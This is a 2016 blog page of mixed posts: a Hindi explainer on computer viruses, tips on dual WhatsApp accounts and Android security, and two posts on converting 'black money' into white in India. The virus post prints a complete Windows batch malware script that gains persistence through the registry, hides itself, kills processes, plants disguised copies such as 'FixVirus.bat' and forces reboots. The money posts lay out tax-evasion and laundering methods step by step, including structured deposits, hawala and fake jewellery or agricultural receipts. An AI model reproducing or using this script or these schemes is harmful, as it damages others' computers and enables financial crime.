Monday, 5 December 2016

कंप्यूटर वायरस किया हे ?


     दिन ब दिन कंप्यूटर और  मोबाइल का बेबहार बढ़ता जगह हे।  तो ऐसे में  बहत सारा कंपनी ने ग्राहक को आक्रसित करेने केलिए नये नये  सॉफ्टवेर भी बनाने लगे हे । एक सॉफ्टवेर के पहले चरण को प्रोग्राम कहते हे । तो बहत सारा प्रोग्राम मिल कर एक सॉफ्टवेर बनता हे । तो ऐसे सॉफ्टवेर बनाने से हमारी रोजमरा की कार्य बहत आसान हो जाता हे । 
    लेकिन दोस्तों कई लोग ऐसे भी हे जो प्रोग्राम तो बनाते हे लेकिन ओ प्रोग्राम कंप्यूटर और मोबाइल को बिगड़ने केलिए होता हे । उसी प्रोग्राम को वायरस बोलते हे । 

सॉफ्टवेर और वायरस में किया अंतर हे ?

  जैसे की हमारी सरीर चलने केलिये जान चाहिए उसी  तहरा कंप्यूटर और मोबाइल हार्डवेयर को चलने केलिए सॉफ्टवेर की जरुरी हे । जैसेकी हमारे सरीर को बीमारी होता हे उसी तहरा कंप्यूटर भी वायरस की चपटे में आताहै । तो कैसे जाने फरक सॉफ्टवेर और वायरस के बिच में ? आईये जानते हे-

  सॉफ्टवेर :-

      सॉफ्टवेर कंप्यूटर चलने में मदद करता हे और हमारा बहत सारा काम को आसान बनाता करता हे । 
  सॉफ्टवेर चलने से कंप्यूटर को नुकसान नही होता हे । 


      वायरस कंप्यूटर में चलरही सॉफ्टवेर को खराप करलेता हे और धीरे धीरे सरे कम्युटर को नाकाम करलेता हे । कंप्यूटर हैंग होना, सॉफ्टवेर चलाने में परिसनि  आना बार बार कंप्यूटर अपने आप चलना और बंद होना वायरस का लख्यन हे ।   

 कुछ वायरस का नाम :

    इल्वयू (iloveyou )

    कोड रेड (code red )

    मेलिसा (melissa )

    ससर (sasser )

    ज़ीउस (zeus )

    कॉन्फिकेर (conficker )

   स्टक्सनेट (stuxnet )

   मैडूम (mydoom )

   करयप्टोलोकेर (cryptolocker )

   फ्लैशबैक (flashback )

वायरस प्रोग्राम :-

@Echo off
color 4
title 4
title R.I.P
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
start calc
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
time 12:00
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

इये सेफ अप्प के जानने केलिए। 

अगर इये पोस्ट आपको अछा लगा तो लईक कीजिये, शेयर और सब्सक्राइब कीजिये ।





Sunday, 4 December 2016

How to use more than one whatsapp in single mobile?

How to use more than one whatsapp in single mobile?

WhatsApp is one of the most popular and commonly used Instant messaging apps these days and due to its simplicity and Easy to Use interface, users are able to use it without any hassle.
If you run dual SIM in your mobile phones, you might be willing to enjoy two separate WhatsApp account for your two different telephone numbers. Isn't it?

However, this is where WhatsApp puts limitations on its users. WhatsApp users can not use more than one WhatsApp account on their mobile devices.
Today, I am introducing you not one but multiple solutions to your problem that will allow you to run two WhatsApp accounts in one phone.


10 tips to protect your anroid device.

10 tips to protect your android device.

Smartphones have come to define us by being the portal to our online identity and as such should be treated with care and secured against any wrongdoing online (hacking) or offline (stolen). If you are not careful, losing your smartphone may mean more than just a loss in contacts and phone numbers. We’re talking about your social media accounts, your synced files, important documents, your emails, photos and messages.

Your entire information is traceable and downloadable and may be shared all over the World Wide Web if you are not careful enough.

While we’d love it if people don’t mess around with other people’s personal information, putting morale aside, this is the virtual world where thieves and hackers hide behind anonymity and are hard to trace. There is no one better to protect your own data, than you. We hope these tips and tricks will be of help in that endeavor.

1. Do Not Save All Of Your Passwords

 Many users tend to save their passwords to online services and sites on their device, never once thinking about what it would mean to a person who got their hands on the phone. Avoid having all important passwords saved in your device particularly when it comes to banking or payment apps.

2. Use Android In-built Security

If you are running on Jelly Bean, you can have a screen lock and encryption enabled to further enhance your security. There are many types of screen locks available for you to choose from such as password, pin, pattern and face unlock, available in your Android settings. Even when setting pins or pattern locks, try not to make it easy for hackers to guess your password.

3. Lock Your Apps

It is necessary to lock your apps, especially the ones holding private information that you wish nobody but you could see. This is a second layer of security to prevent anyone from using your lost device particularly if they have managed to bypass your locked Android.
You can use a free app like App Lock for this exact purpose. The idea here is not to lock every single app in your device, just really data-laden ones like your email apps or file managers.
While you at it, avoid using a combination of a pin or pattern lock that can be traceable from the smudges of your screen (Yes, it is traceable).

4. The importance of app permissions

Before you begin installing an app from Google Play, a list of requested permissions will pop up to show you what permission the app requires. Apps require permissions to do things but not all of them are necessary.Always read through the permissions to make sure they make sense and correspond to what the app actually does eg. an alarm app does not require a permission to access your text messages. This is a real important step because not all apps in the Play Store are safe. you have install app for trusted vendor.While you’re at it, make it a habit to read the comments as well as the rating of the app that you are going to download. This helps you understand more about what the app really does without trying it out firsthand.

5. Securing Your Network

One of the most important thing in protecting your Android is to secure your network. Try to avoid using public WiFi whenever you want to do something important like doing your banking online. As long you are sharing the same network with the public, they can easily sniff out your packets and translate it into actual data of your private information i.e. your passwords.
You can protect your information by using apps like Hideninja VPN so that your outgoing connection is always encrypted, making it harder for anyone to sabotage your data. If you suspect that your device is being attacked, WiFi Protector can help fend off these attackers. To further enhance your network security you can apply settings from SecDroid but note that this app is only for rooted phones.

6. Use Mobile Security App

It will make your job easier to have an app that handles most of your security issue. Find a mobile security app that you are comfortable using, for example: Lookout Security & Antivirus and avast! Mobile Security. Even with a security app, you shouldn’t let your guard down as Android malware is getting stronger and more rampant, which brings us to the next tip.

7. Create Multiple User Account To Protect Privacy

If you own an Android tablet and have to share it with a sibling, a spouse, or your kids, having multiple user accounts will help each of you protect your privacy. In Jelly Bean for tablet, there is an option for you to create multiple user accounts. You can create another general account for anyone who wants to use your device. The option is under the Settings > Users section.

8. Prepare A Backup Of Your Data

A backup of your precious data is a must-have in the day and age of smartphones. Picture the worst case scenario where your Android device has been stolen or hacked. The last thing you can do is perform a remote wipe (see #10). Without a backup, you will lose all your information in your device.
Even if you could retrieve your stolen phone, chances are that hackers that have managed to access your device will render it useless. If you have a backup however, you can still restore your Android device back to its original state. You can choose to backup important information to the Cloud, your desktop or even to a flash drive, for insurance.

9. Track Your Lost Device

So you have a backup already but you really want to get your lost device back. Well, as the smartphone industry would have it, your phone is built to be trackable, via GPS. The catch is, you have to enable GPS on your phone for it to be tracked. Fret not because, there are plenty of device-tracking apps for Android that can help you locate your lost or stolen device, some can even turn on the GPS on your phone remotely.

10. Enable Remote Wipe

So you are at the point where you have everything installed and ready to go. But, you still need one last feature – the ability for you to wipe your device remotely. This is necessary, especially when you are sure that your Android is lost (forever). There’s no crying over spilt milk now – we can only prevent them from turning it into cheese.
I recommend 3CX Mobile Device Manager because it is free and easy to use. You can sign up for the account here and let just hope that the day you need to use their remote wipe feature will never come.



Thursday, 10 November 2016

5 Ways People Use to Convert Black Money into White Money

 Dushmanta Mohapatra
The Article no ways encourage taxpayers to use any of the below methods. The Article is just to let people know about what others are doing to convert their Black Monet into white money currently in India. In addition to those mentioned below there are many other methods which people use to convert their black money into white money.
CASE 1: Go to a Jeweler. Give him the amount you want to convert into white as cash. he would give you a cheque back for the same amount less 4%. He would give you a purchase bill to show that you have sold silver utensils to him. On the amount of the cheque when you file your return you will have to pay no capital gain tax as Silver utensils are Personal effects and capital gain does not arise on sale of personal effects. There you go , the money is white now!!!
CASE 2: Conversion of Black Money to White Money with the application of Sec 51 of the Income tax act, 1961.
Mr. X : A Business man who wants to convert his black money to white.
Property: Cost of Acquisition: Rs. 10 Lacs.
Mr. Y: A Salaried person who wants to convert his white money to black may be because he has to make payment in black for the property purchased by him.
Mr. X enters into an agreement with Mr. Y for the sale of property for Rs. 150 lacs with a condition that advance money of Rs. 30 lacs shall be given by Mr. Y and balance shall be paid within 3 months else advance money shall be forfeited.
Modus Operandi: Mr. Y makes payment of Rs. 30 lacs to Mr. X by way of a cheque as the advance money and Mr. X in turns gives the black money to Mr. Y of the same amount. Now, Mr. Y intentionally fails to make balance payment within the due time and the amount is forfeited by Mr. X. In this manner black money of Mr. X is converted to white money.The money is white now!!!
CASE 3: Another popular way of converting black into white money is by getting a gift from a relative. For this modus operandi, the relative must possess white money. For example, you have some black money (say Rs. 10 lacs) which you want to convert into white. You can ask your relative to gift you Rs.10 lacs by way of cheque and you will in turn transfer your black money to him/her. Here 56(2)(vii) is not attracted as gift is received from a relative.
CASE 4:- Converting black to white by way of cheque
People also give the black money to a person (say a family member or a friend) and take a cheque from them. They show that as a loan receipt and thus they can temporarily convert their black money into white.
Then they again give them a check as a repayment of loan and receive cash which converts white to black again, but during the time the loan is outstanding, they convert their black into white, but people who do this are not aware that Section 68 on loans is applicable and you will have to prove the creditworthiness as well as the genuineness of transactions to the IT Department or else the loan receipt will be treated as income from undisclosed sources.
CASE 5: Another popular way of converting black into white money is showing income in cash like tuition income or any other professional fees.Just pay the tax at normal rate and your money is white now!!!!
Also people make investment where it is allowed to invest in cash and where the maturity is tax free for example buying an insurance policy where you are not required to show all your premiums and the maturity is tax free. For example your insurance premium is 25000/- per annum and you can pay 6000 in check (shown in books) and remaining in cash, people increasing the proportion of premium paid in cash increasing as and pay entire premium in white for last two years before maturity. No ITO is going to check premium of more then last two years and it is a small example. People are paying huge cash premiums everyday. In case of this small premium, the cost of investigation exceeds the benefit to the exchequer so the ITO will give a test check for at the max last two years.
  • I don’t recommend readers to follow any of these steps. I just want them to be aware regarding these false practices.
  • I encourage open discussion regarding this article but advices, opinions, suggestions which may land the opinion seekers into trouble later on are not encouraged.
  • I trust that a tax planning should be done in such a way that it can stand the test of the legal battle of course subject to debates.

how to convert black money to white money in thchnical way ?

What is Black Money – Black money is tax evaded income. It can be earned through both legal and illegal means. The majority of the black money is the income received in cash not accounted in books and not revealed to the government for tax purposes.

How does the black money get generated?
Corruption– Mr. Blackappa, an officer in government service, demands Rs.1 lakh from Mr.Shortcut for doing a favour (say to approve the building sanction plan). Mr. Shortcut hands over Rs.1 Lakh to the officer in cash (no one takes a bribe in cheque/demand draft!). This money will not be accounted in the books of Blackappa and he won’t pay any taxes on it (it may be good to legalize bribe and collect taxes on it) Count # 1 – Rs.1,00,000 black money is generated.
Sale of property – Mr. Greedy buys a property from Mr. Cheat for a total sale value of Rs.50 Lakhs. He takes Rs.35 Lakhs in cheque/DD and the balance in cash. He pays stamp duty on Rs.35 Lakhs, and the seller pays capital gain tax considering the value as Rs.35 Lakhs. Count # 2 – Rs.15,00,000 black money is generated.
Sale of goods/services without invoice – You buy a sofa set from a furniture dealer. What is the price? The shopkeeper will tell “the price is Rs.60000 plus taxes at 14.5%”. Any discount? The answer from him will be “Yes madam, I can offer it at Rs.58,000 without the bill. If you want, I can write on a piece of paper or on a quotation” Count # 3 – Rs.58,000 black money is generated.
Accounting for fictitious expenses –  A businessman tells his accountant “I can’t pay so much tax. Do something, reduce the taxes” The accountant accommodates by booking fictitious expenses. If the businessman declares a profit of Rs.15 Lakhs against the actual profit of Rs.25 Lakhs, black money of Rs.10 lakhs is created. Count # 4 – Rs.10 Lakhs black money is generated.

How is it converted?
The difficult part is converting the black money into white money without any taxes. In all the above examples, the people who have earned money in cash (black money) can’t deposit it in the bank. Right? So, they have to hoard the cash somewhere, say in a bank locker, suitcase, etc. Or they can also spend this amount in cash towards the purchase of property, white goods, etc. Let’s understand the ways of converting black money.
Showing fictitious sales – There was a movie casted by the son of a powerful politician. This movie was an utter flop. But, it ran ‘houseful’ (fictitious) in Kalpana Theatre of K G Road for a year! During those days, people were talking that the black money earned by the father is converted into white by showing the income from the movie!
The money earned through illicit means or corruption is converted with the help of businessmen by booking fictitious sales in the books of the company.
Increase the sale price of an asset – One of my clients decided to buy a property from a senior government officer for a price of Rs.42 Lakhs. But the Officer wanted him to pay Rs.60 lakhs in cheque! In turn, he wanted to return the difference amount of Rs.18 Lakhs and additional stamp duty/registration charges in cash to the buyer. Thereby the Officer converted Rs.18 Lakhs of black money to white without paying any taxes. (He reinvested the sale proceeds in another property and got the long term tax exemption!)
Hawala Route – Have you heard about hawala transactions? If not, I will tell you in simple words. Assume Mr.ABC, a politician or government officer in Bangalore has Rs.25 Lakhs in cash. Since it is black money, he can’t deposit the same in the bank. So, he identifies a hawala agent (don’t search in google, you won’t get one!). The Hawala operator takes the cash in Bangalore and through his counterpart, hands over Rs.25 Lakhs worth in dollars/pounds/dirhams in a foreign country to his/to his representative. Mr.ABC gets this money back to India as Foreign Direct Investment (FDI) or seed fund in a private company, etc. Or he may choose to invest abroad in properties / shares. Thus, he converts black money to white without paying any taxes.
Depositing in banks less than Rs.50000 – This route is taken by small time operators. They open multiple bank accounts and deposit cash upto Rs.50000 at a time. Remember, if you have to deposit over Rs.50000, you have to give PAN details to the banker. Mostly, these kind of petty transactions goes unnoticed by the income tax department and thus, black money is converted to white without paying any taxes.
Agricultural Income – Agricultural Income is exempt from Income Tax. This means the money earned from the sale of paddy, pepper or wheat is exempt from tax. So, the people who earn black money will obtain a fictitious receipt from traders in agricultural commodities as if they have sold the products. For the sake of records, these people will acquire or show the proof of ancestral property in villages!
Gifts from relatives and friends on occasions – Any amount of money received from relatives (gift) is exempt from Income Tax. Is it not an easy way to convert black money to white? Simple, show the cash received in your son’s or daughter’s birthday as gifts from relatives!
Gifts from non-relatives and friends attract income tax. But those who have huge black money can show gift and pay taxes. Still the money earned through corrupt practices can be converted into white (after paying taxes). One of the classic examples is the amount of gift declared by a former Chief Minister who paid huge taxes during that year. She declared around Rs.200 Crores as gift received from her well-wishers and paid taxes on it!
Sale of Gold and Diamonds – Well-known professionals suggest this route. Suppose, Mr.XYZ has Rs.25 Lakhs cash and gives this amount to a Jewellery shop (not all shops will do this kind of dirty job). The Jewellery shop will issue a receipt for having bought Gold/Diamond worth Rs.25 Lakhs and make payment in a cheque to Mr.XYZ. For facilitating this transaction, he will charge a fee. Thus Mr.XYZ converts his black money into white, without paying any income tax.

Avenues for spending black money in black
Investing in property – The middle-class black money earners spend/invest them in black. For example, Mr.GHK sells a house for Rs.90 Lakhs (of which, he takes Rs.30 Lakhs in Cash – black) and reinvests/buys another flat/plot by giving Rs.30 lakhs apart from white money. So, the rule is Black for Black and white for white
Spend on weddings and functions – I needn’t explain it. If you attend the weddings at Palace Grounds in Bangalore and hi-fi wedding halls, you will get to see the ‘real color’ of black money. As I understand there are people who spend 2-5 Crores for a wedding! A large sum of corrupt money is spent on social events and functions.
Buying goods/services where the identification is not mandatory – For example, white goods, building houses and its interiors, etc., are done using black money earned in cash.
School Fee and donations – You may be aware of donations! For the medical seat, over a crore of rupees to be paid as a donation in cash!
Buying gold / precious metals – Instead of accumulating cash, people will buy gold, diamond and other precious metals. People buy gold in small quantities, from different shops, in the name of all members of the family.
Elections – As per the Election Commission of India, a maximum of Rs.70 lakhs can be spent by a candidate per Lok Sabha Constituency. Do you believe that they spend only Rs.70 lakhs? I understand that each candidate spends over Rs.30 Crores per Lok Sabha Seat!  From where is this kind of money available? Corrupt money is spent in elections.

Now the big question – Is this not known to the Government? What actions have they taken to curb the black money? Honestly, so far, nothing much is done, except ‘lip service’ by a few politicians and a few ‘cosmetic’ changes in the law.
Recently, Special Investigation Team (SIT), appointed by the Supreme Court has come out with its findings and suggestions to curb black money. In my next article, I will write about other sophisticated ways of converting black money such as creating multi-layer companies, rigging in stock market, participatory notes, etc. and also the recommendations of SIT report.